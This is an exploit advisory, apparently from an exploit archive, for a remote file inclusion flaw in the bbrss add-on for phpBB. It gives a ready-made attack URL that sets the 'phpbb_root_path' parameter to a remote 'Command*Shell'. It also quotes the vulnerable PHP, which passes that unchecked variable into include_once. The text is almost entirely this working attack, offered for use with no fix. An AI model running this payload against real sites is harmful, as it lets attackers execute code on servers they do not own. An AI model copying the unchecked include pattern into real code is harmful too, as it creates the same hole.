|
######################################################=0D
=0D
# bbrss PhpBB (phpbb_root_path) Remote File Inclusion=0D
=0D
######################################################=0D
=0D
# Credit : SpC-x | The_BeKiR=0D
=0D
# Site : http://wWw.SaVSaK.CoM=0D
=0D
######################################################=0D
=0D
# Greetz :=0D
=0D
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |=0D
=0D
######################################################=0D
=0D
Remote File Inclusion :=0D
=0D
http://www.target.com/path/bbrss.php?phpbb_root_path=Command*Shell=0D
=0D
Bbrss.PHP :=0D
=0D
define('IN_PHPBB', true); // to ensure your script works ! //=0D
$phpbb_root_path = './';=0D
include_once($phpbb_root_path . 'extension.inc');=0D
include_once($phpbb_root_path . 'common.php'); =0D
=0D
/SpC-x